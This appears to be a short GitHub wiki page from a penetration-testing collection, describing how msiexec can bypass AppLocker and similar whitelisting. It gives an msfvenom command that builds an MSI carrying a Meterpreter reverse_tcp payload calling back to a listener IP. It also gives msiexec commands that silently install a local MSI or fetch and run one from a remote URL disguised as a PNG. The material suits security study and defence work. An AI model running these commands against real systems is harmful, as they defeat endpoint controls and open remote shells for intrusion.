Skip to content

Application Whitelisting Bypass

Jump to bottom
netbiosX edited this page Jun 16, 2017 · 3 revisions

Application Whitelisting Bypasses

The purpose of this page is to contain all the technical details regarding bypassing application whitelisting solutions such as software restriction policies, applocker and device guard.

MSIEXEC

MSIEXEC is a Microsoft utility which can be used to install applications. If MSI files are not blocked by AppLocker then it can allow an attacker to bypass AppLocker executable rules.

Metasploit MSFVenom can be used to generate MSI files that contain a Meterpreter payload:

msfvenon -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=4444 -f msi > pentestlab.msi

MSI - Meterpreter Payload

Execution of the MSI file on the target system will return a Meterpreter session:

MSIEXEC - Meterpreter

Msiexec utility has the ability to execute MSI files either locally or remotely. Additionally MSI files that have been renamed to PNG to avoid detection can be also executed normally and have the same results.

msiexec /quiet /i cmd.msi

msiexec /q /i http://192.168.100.3/tmp/cmd.png

If command prompt is locked then MSIEXEC can be executed from Windows Run:

Clone this wiki locally